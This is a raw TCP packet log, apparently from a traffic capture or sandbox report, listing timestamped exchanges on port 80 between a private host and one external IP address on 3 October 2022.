Oct 3, 2022 17:42:21.780426979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:21.780735970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.288398981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.288568020 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.537168026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.537168026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.564279079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564318895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564349890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564395905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564426899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564471006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564502954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564511061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.564511061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.564536095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564568043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564568996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.564569950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.564589024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.564645052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.564713001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.591871977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.591933966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.591965914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592009068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592032909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592032909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592041969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592075109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592078924 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592078924 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592106104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592143059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592154980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592154980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592175961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592212915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592236996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592268944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592274904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592317104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592349052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592382908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592413902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592411995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592412949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592446089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592489004 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592489958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592509031 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592524052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592525959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.592556953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.592602968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.593030930 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.619797945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.619836092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.619880915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.619915009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.619946957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.619960070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.619980097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620012045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620019913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620058060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620059967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620090961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620099068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620125055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620157003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620189905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620207071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620220900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620253086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620264053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620264053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620285988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620295048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620320082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620326996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620352030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620353937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620384932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620424986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620429039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620462894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620501995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620512009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620532990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620565891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620595932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620596886 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620615959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620629072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620635033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620671034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620676041 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620703936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620734930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620765924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620770931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620770931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620798111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620840073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620871067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620902061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620933056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620975971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.620979071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620979071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620979071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.620979071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.621007919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.621041059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.621062040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.621081114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.621102095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.621135950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.621143103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.621143103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.621198893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.624008894 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648289919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648330927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648377895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648411036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648442030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648488998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648519993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648551941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648582935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648614883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648631096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648632050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648632050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648648024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648679972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648701906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648701906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648716927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648745060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648749113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648777962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648809910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648842096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648874044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648891926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648904085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648936987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648891926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648968935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.648969889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.648968935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649013042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649048090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649089098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649127007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649158955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649189949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649221897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649255037 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649270058 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649270058 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649270058 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649297953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649305105 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649329901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649370909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649401903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649441004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649471998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649504900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649513960 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649547100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649588108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649591923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649591923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649620056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649652958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649683952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649714947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649738073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649738073 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649746895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649766922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649781942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649812937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649844885 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649847984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649877071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649918079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649930954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649950027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.649981976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.649982929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650026083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650027990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650074005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650105953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650129080 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650137901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650171041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650187969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650202036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650235891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650278091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650285006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650310993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650326014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650343895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650388956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650420904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650466919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650490046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650511980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650511980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650531054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650563955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650580883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650598049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650639057 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650670052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650681973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650702953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650734901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650767088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650773048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650799036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650830984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650859118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650859118 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650862932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650916100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.650924921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650958061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.650999069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.651076078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.651076078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.651099920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.651145935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.651251078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.651251078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678173065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678236008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678282022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678313971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678344965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678385973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678417921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678451061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678462029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678495884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678536892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678555965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678570032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678601980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678613901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678634882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678643942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678667068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678677082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678699970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678703070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678731918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678774118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678793907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678807020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678838015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678855896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678872108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678893089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.678930044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.678975105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679008007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679039001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679069042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679069042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679088116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679126978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679158926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679169893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679169893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679169893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679191113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679224014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679234982 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679255962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679263115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679290056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679297924 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679322004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679352999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679359913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679359913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679384947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679416895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679424047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679449081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679492950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679511070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679516077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679538965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679577112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679579973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679600000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679631948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679666996 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679691076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679723024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679745913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679745913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679755926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679789066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679797888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679799080 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679821014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679841995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679853916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679853916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679886103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679913044 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.679919004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679955959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.679980993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.680023909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.680032015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.680032015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.680032969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.680057049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:22.680110931 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.681592941 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:22.944618940 CEST	80	49711	85.31.46.167	192.168.2.6
